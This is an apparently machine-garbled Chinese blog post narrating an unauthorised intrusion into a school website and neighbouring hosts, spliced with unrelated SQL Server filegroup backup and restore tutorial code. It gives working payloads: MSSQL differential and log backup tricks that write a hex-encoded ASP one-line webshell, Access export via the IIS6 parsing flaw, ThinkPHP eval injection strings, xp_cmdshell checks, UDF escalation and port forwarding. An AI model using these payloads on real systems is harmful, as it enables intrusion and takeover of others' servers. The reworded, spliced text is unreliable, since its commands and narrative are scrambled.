MSSQL差距备份,便是和前一回备份作比较,把不等同的剧情备份下来,那样,只要前二回备份后,插入新的内容,差距备份就能够把刚插入的剧情备份出来,而以此备份文件将大大减弱,得到webShell的成功也加强了重重! 差别备份的流程大概那样: 1.完全备份叁回backupdatabase库名todisk='c:ddd.bak';-- 2.创办表并片头曲入数据 createtable[dbo].[dtest]; insertintodtestvalues(0x3C25657865637574652872657175657374282261222929253E);-- 3.进展差异备份 backupdatabase库名todisk='目的地点d.asp'WITHDIFFERENTIAL,FORMAT;-- 上面 0x3C25657865637574652872657175657374282261222929253E
来源:
USE master
--以下代码轻便地示范了怎样举行理文件件组的备份及回复(在还原时,模拟了遗失第一回文件组备份文件的状态卡塔 尔(英语:State of Qatar)。
--成立测验数据库
CREATE DATABASE db
ON PRIMARY(
NAME='db_data',
FILENAME= 'c:db_data.mdf'),
FILEGROUP db_fg1(
NAME = 'db_fg1_data',
FILENAME = 'c:db_fg1_data.ndf'),
FILEGROUP db_fg2(
NAME = 'db_fg2_data',
FILENAME = 'c:db_fg2_data.ndf')
LOG ON(
NAME='db_log',
FILENAME ='c:db.ldf')
GO
正是一句话木马的开始和结果: 如下是网络科学普及的歧异备份代码,思路风度翩翩致!
运用差距备份进步提升backupwebshell的成功率,裁减文件大小 步骤: declare@asysname,@snvarcharselect@a=db_name(),@s=0x77006F006B0061006F002E00620061006B00backupdatabase@atodisk=@s createtable[dbo].[xiaolu]; insertintoxiaoluvalues(0x3C25657865637574652872657175657374282261222929253E) declare@asysname,@snvarcharselect@a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000backupdatabase@atodisk=@sWITHDIFFERENTIAL,FORMAT 0x77006F006B0061006F002E00620061006B00为wokao.bak 0x3C25657865637574652872657175657374282261222929253E是 0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:webwokao.asp
进度不算曲折,但还算长久,知识点比较零碎,切合生手学习。
--创设并完全备份数据库
CREATE DATABASE db
BACKUP DATABASE db TO DISK='c:db.bak' WITH FORMAT
GO
--在文件组db_fg1上开创表,并单独创制该公文组的备份
CREATE TABLE db.dbo.tb(id int) ON db_fg1
BACKUP DATABASE db FILEGROUP='db_fg1' TO DISK='c:db_fg1.bak' WITH
FORMAT
GO
评释:方法不是自己想的,小编只是写工具,默认获得shell是
自家意识上边代码,不时会隔着靴子挠痒痒,而向来用 backupdatabase库名todisk='c:ddd.bak' createtable[只要前一次备份后,模拟了丢失第二次文件组备份文件的情况)。dbo].[dtest]; insertintodtestvalues(0x3C25657865637574652872657175657374282261222929253E) backupdatabase库名todisk='目的地点d.asp'WITHDIFFERENTIAL,FORMAT;-- 却得以成功,所以把最原始的秘技写出来!思路是前人所创,那不说大家也清楚的! 库名一定要有效的库名,日常注入工具都足以拿走!假设某站过滤"‘",将要把字符内容转为数值了!
那么,那时小编还小,大家后生可畏并来回想,那多少个年 大家年轻时 蛋疼的煎熬。
--标识事务管理
BEGIN TRANSACTION Tran1 WITH MARK
在其余文件组上创制表
CREATE TABLE db.dbo.ta(id int) ON [PRIMARY]
CREATE TABLE db.dbo.tc(id int) ON db_fg2
INSERT db.dbo.tb SELECT id FROM sysobjects
--备份种种文件组,况且顾份专业日志
BACKUP DATABASE db FILEGROUP='PRIMARY' TO DISK='c:db_primary.bak'
WITH FORMAT
BACKUP DATABASE db FILEGROUP='db_fg1' TO DISK='c:db_fg1_new.bak'
WITH FORMAT
BACKUP DATABASE db FILEGROUP='db_fg2' TO DISK='c:db_fg2.bak' WITH
FORMAT
BACKUP LOG db TO DISK='c:db_log.bak' WITH FORMAT
GO
英特网还也有log增量备份的,笔者也把他记下一下
另风姿浪漫种log增量备份手艺: ';alterdatabasenullsetRECOVEEvoqueYFULL-- ';createtablecmd-- ';backuplognulltodisk='f:cmd'withinit-- ';insertintocmdvalues(0x3C2565786563757465287265717565737428226122292 9253EDA)-- ';backuplognulltodisk='备份路线'-- PS:0x3C2565786563757465287265717565737428226122292 9253EDA是一句话小马16进制转来的 提起一句话马,还是能犹如此三种写法: a).executerequest.
间距学校今年,老铁摆了饭局送自个儿,席间笔者和楷文(淡定哥卡塔 尔(英语:State of Qatar)有个约定。。。
CREATE TABLE db.dbo.tb(id int)
--删除数据库
DROP DATABASE db
GO
急切,转眼大器晚成载,人事退换,姿容沧海桑田,楷文兄,没本身的日子你完好无损。母少将网作者还未有解决,你是或不是早已炸了她的墙角?
COMMIT TRAN Tran1
--从文件组备份中平复数据
RESTORE DATABASE db FILEGROUP='PRIMARY' FROM DISK='c:db_primary.bak'
WITH NORECOVERY,REPLACE
RESTORE DATABASE db FILEGROUP='db_fg1' FROM DISK='c:db_fg1.bak' WITH
NORECOVERY
RESTORE DATABASE db FILEGROUP='db_fg2' FROM DISK='c:db_fg2.bak' WITH
NORECOVERY
RESTORE LOG db FROM DISK='c:db_log.bak' WITH RECOVERY
SELECT COUNT(*) FROM db.dbo.tb
GO
鉴于种种原因,一贯从未充分的光阴。。。渗透进程参差不齐
--事务达成后插入数据
INSERT db.dbo.tb SELECT id FROM sysobjects
GO
--删除测验数据库
DROP DATABASE db
来看下情状:
--还原数据到事情标识 Tran1 前
BACKUP LOG db TO DISK='c:db_log.bak' WITH FORMAT
DROP DATABASE db
RESTORE DATABASE db FROM DISK='c:db.bak' WITH NORECOVERY
RESTORE LOG db FROM DISK='c:db_log.bak' WITH STOPBEFOREMARK='Tran1'
SELECT COUNT(*) FROM db.dbo.tb
/*--事务标识 Tran1 前并没有开创表,所以会接到错误消息
对象名 'db.dbo.tb' 无效。
--*/
GO
全校主站:www.*****x.cn
--还原数据库到业务标记 Tran1 后
DROP DATABASE db
RESTORE DATABASE db FROM DISK='c:db.bak' WITH NORECOVERY
RESTORE LOG db FROM DISK='c:db_log.bak' WITH STOPATMARK='Tran1'
SELECT COUNT(*) FROM db.dbo.tb
*音讯搜罗
/*--结果
0
(所影响的行数为 1 行卡塔 尔(阿拉伯语:قطر
--*/
GO
--删除测验
DROP DATABASE db
千帆竞发询问结果:
少数数据库的调用做了防注入管理:
[AppleScript]纯文本查看复制代码
?
web服务:iis6.0ASP 支持aspx
数据库:access
网址后台:
手工业找到数字型注入点:http://www.s*******.cn/news_detail.asp?id=954
明朗的入库查询 sqlinjection
Sqlmap跑起来
结果不太快心遂意,爆破不出表和字段,看来管理员为了幸免猜表做了表前缀
对此access的注入,猜不到表,渗透一曝十寒
新兴又在复习的时候见到了sql注入access导出txt等公事方式,不可能导出asp 不过我们得以合作IIS6.0深入分析漏洞导出binghe.asp;binghe.txt之类的文书
那么难点来了 , 路线何地找?? 又不是phpmyadmin之类的能够报错文件,asp报错路线非常少,可是作者猝然想到了conn.asp和5c%暴库
5c%是绝非中标,conn.asp仍然是能够的,直接访问数据库连接文件,数据库连接文件和数码调用的相对路线冲突招致报错,没有错爆出了相对路线:
那便是说来sqlmap的–sql-shell用传说中的sql推行access导出txt、xls试试 合作iis6.0剖析漏洞(PS:access已经不适合时机,没商量过,小菜也不清楚access的sqlshell是否能够试行,以往在后台境遇过能够实施sql的效应,举例帝国的少数版本卡塔 尔(阿拉伯语:قطر
次第推行以下语句就能够导出一句话了
[AppleScript]纯文本查看复制代码
?
1
2
3
4create table cmd(a varchar(50))
insertintocmd(a)values('一句话木马')
select*into[a]in'e:webwebshellcc1.asa;x.xls' 'excel4.0;'fromcmd
drop table cmd
更简便的
[AppleScript]纯文本查看复制代码
?
Select 'asp一句话木马'into[vote]in'e:webwebshellcc1.asa;x.xls' 'excel8.0;' fromvote
Sqlshell实践无果 看来是本人想多了 恐怕access注入点一贯就无法收获真正的sqlshell
转而看其网址后台,用burpsuite爆破没跑出去,, 退步
小站,也看不出是哪些cms,扫了目录,未有大的意识,有上传,然而急需登入,不大概有效行使,有留言板,尝试XSS,无果,存在iis短文件名走漏漏洞,利用无果
侵袭脚步又虎头蛇尾
上次询问主站未有何样收获 C段之,
瞄到八个站 本市的**中学 名满天下!
流入三个,,sqlmap之
[AppleScript]纯文本查看复制代码
?
--current-user --sql-shell--os-shell
sa!!!!
[AppleScript]纯文本查看复制代码
?
selectcount(*)frommaster.dbo.sysobjectswherextype='x' andname='xp_cmdshell'
回来”1″,表达存在存款和储蓄进程xp_cmdshell
试着执行cmd 不行啊老是过期 怪事
os-shell尝试得到人机联作式cmd SQLmap自动提权修复xp_cmdshell也是过期 不清楚何地出了难点
手动在注入点实行也特别。。
如何做呢?动脑筋依旧找目录写个shell
用啊D列个目录 列了一会通过相比较就找到了根目录
D:wwwrootdxzx
跑了数量 解了md5 进了后台 想差别备份 可是手抖弄了个插配置文件一句话 然而忘了闭合asp标志
新生网址挂了 差相当的少吓哭 作者确实不是故意的 。 不能复现 等苏醒了再说吧
个人对此表示极度歉意,对不起,已经致道歉信与修复方案至管理员邮箱
新兴想到自身是何等的死板,为啥不log备份,增量备份导出shell呢???
让小编喝风度翩翩杯82年的乐事冷静一下
实际log备份导出Public权限都能导出,更何况大家是sa,就算遇到奇葩的磁盘权限,能够品味图片上传目录
#导出方法有以下三种方法:
MSSQL差距备份,正是和前二次备份作比较,把不平等的源委备份下来,那样,只要前叁回备份后,插入新的剧情,差异备份就能够把刚插入的原委备份出来,而以此备份文件将大大收缩,拿到webShell的名利双收也进步了累累!
差别备份的流水生产线大约这样:
[AppleScript]纯文本查看复制代码
?
01
02
03
04
05
06
07
08
09
10
11
121.总体备份三遍(保存地点当然能够改)
backup database 库名todisk='c:ddd.bak';--
2.成立表并片头曲入数据
create table [dbo].[dtest]([cmd] [image]);
insertintodtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);--
3.开展差距备份
backup database 库名todisk='目的地点d.asp' WITH DIFFERENTIAL,FORMAT;--
上面
[AppleScript]纯文本查看复制代码
?
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容:
[AppleScript]纯文本查看复制代码
?
<%execute(request("a"))%>
正如是整合治理的遍布的反差备份代码,思路风度翩翩致!
===================================================
接纳差距备份升高升高backupwebshell的成功率,减弱文件大小
步骤:
[AppleScript]纯文本查看复制代码
?
1
2
3
4declare @a sysname,@s nvarchar(4000)select@a=db_name(),@s=0x77006F006B0061006F002E00620061006B00backup database @a todisk=@s
create table [dbo].[xiaolu]([cmd] [image]);
insertintoxiaolu(cmd)values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000)select@a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000backup database @atodisk=@s WITH DIFFERENTIAL,FORMAT
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:webwokao.asp
扬言:方法不是本身想的,我只是写工具,暗中同意拿到shell是
[AppleScript]纯文本查看复制代码
?
<%execute(request("a"))%>
===============================================================
本身意识下边代码,有的时候会失效,而直接用
[AppleScript]纯文本查看复制代码
?
1
backup database 库名todisk='c:ddd.bak' create table [dbo].[dtest]([cmd] [image]); insertintodtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E)backup database 库名todisk='指标地方d.asp'WITH DIFFERENTIAL,FORMAT;--
却足以成功,所以把最原始的方法写出来!思路是先行者所创,这不说我们也了解的!库名 必定要使得的库名,平常注入工具都能够博得!假使某站过滤 “‘”,将要把字符内容转为数值了!
互连网还应该有log增量备份的,小编也把他记下一下
=====================================================
另生龙活虎种log增量备份技能:
例:在注入点用;联合推行
[AppleScript]纯文本查看复制代码
?
1
2
3
4
5
6';alter database nullsetRECOVERY FULL--
';create table cmd(aimage)--
';backuplognulltodisk='f:cmd'withinit--
';insertintocmd(a)values(0x3C2565786563757465287265717565737428226122292
9253EDA)--
';backuplognulltodisk='备份路线'--
PS:0x3C25657865637574652872657175657374282261222929253EDA 是一句话小马16进制转来的
是为了防御单引号和asp标识的关闭难点,上边是两种能够尝尝的写法:
[AppleScript]纯文本查看复制代码
?
1
2
3
4
5a).<%%25Execute(request("a"))%%25>
b).<%Execute(request("a"))%>
c).%><%execute request("a")%><%
d).executerequest("a")
e).<%25Execute(request("a"))%25>
权力够大还是能直接调用systemobject的函数直接写:限于篇幅,大家能够活动收拾
抑或没拿下 然则自个儿的步履不会停下
C段豆蔻年华圈,相当慢占有个虚弱的网址,账户名和密码都以网址简单的称呼、轻易的提权了
权限还足以
内网 lcx转载过来
不过,c段的内网,意义非常小,抛弃。
转了一会,又二个c段的,直接注入写shell,也是一直溢出提权
又是内网。。运气不是很好哎。
卡的令人想死 猜度是个喳喳服务器,不看她了。。。
拿的c段都以内网,不能够arp胁制目的,嗅探不到。。。。
思路转一下,来看旁注!拿指标的内网
攻破叁个与主站同外网ip的站点 有期望撕入内网。。。
套路是流入进后台 截断拿shell
来提权服务器 又是恶心的内网 老套路转发上去
转车好 登陆 看见那样子
不管他,mstsc/admin,挤下去,,
看了下,主站不在服务器上,运气好背啊,小小内网渗透一下
密码是专擅设定的,其实特不是密码,表达存在ipc$空连接的漏洞,好古老啊,手工业利用一下造访,失利了,小编都没心绪二个三个测量检验了
读取一下拘押密码,扫一下?
没读出来管理员的。。为啥运气这么差 导出hash去破解笔者也懒得搞了
嗅探开首,不久就有结果了哈哈
不过都以某些失效的音讯,现在那嗅探着,过个十天半个月的再来看看
内网存活:
那就是说难点来了,大家行还是不行在内网里面netfake?
指标站的内网ip大家是经过在网址主页点三个校内应用得到消息的
事实注解不行,,,先放在那里嗅探吧 。。。。。
其实还会有ip冲突要挟,然而威吓就没看头啊 作者如故要获得权力
再来看看别的一个旁站
后一次看吧 背着书包上高校。。。。。。。。。。。。
额 放假了
再来看看海口市********育中心
天意比较好,Thinkphp框架,命令实施直接抢占
具体方法:
[AppleScript]纯文本查看复制代码
?
1
2
3index.php/module/aciton/param1/${@phpinfo()}
index.php/module/action/param1/{${eval($_POST[s])}}
**来了来了提权**
**翻到了root直接来udf但是用t00ls的shell提权来得创设lib/plugin目录战败**
向来在菜刀里面右键成立目录**成功**
上用户
实在此的udf 为了防备种种错误 笔者写过三个小工具 传上去运营,将 自动udf mof 和 lpk 二种方法提权,详细情况见
[AppleScript]纯文本查看复制代码
?
lcx 连接上去拜望
翻下目录 未有对象站音信等
码字很累,完成篇非常快会写出来,更加美观好哦
未完待续。。。
编辑:数据库 本文来源:只要前一次备份后,模拟了丢失第二次文件组备
关键词: